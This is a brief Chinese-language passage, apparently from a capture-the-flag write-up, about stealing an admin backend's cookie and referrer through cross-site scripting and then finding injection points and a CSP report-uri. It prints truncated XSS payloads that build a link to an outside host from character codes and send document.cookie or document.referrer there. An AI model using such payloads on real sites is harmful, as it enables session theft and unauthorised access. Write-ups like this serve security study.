最终打后台的payload
http://54.222.168.105:8065/?...104,116,116,112,58,47,47,48,120,98,46,112,119,63)%2bdocument.cookie;a.click();alert(2);
这里有个小问题是是被过滤了,这里给了新的提示
2017.08.12 15:56:54后台代码...104,116,116,112,58,47,47,48,120,98,46,112,119,63)%2bdocument.referrer;a.click();alert(2%29%3B%3C%2fscript%3E
这里打到后台地址和...cookie,进入后台发现一无所获,到很晚之后才发现后台有login....中有一部分report-uri /report
这是一个CSP中的功能,当请求处罚了CSP时,就会向report-uri发送一些信息
这里多个参数都存在注入点,其中过一个账号可以被解开,使用这个账号登陆后台就可以获得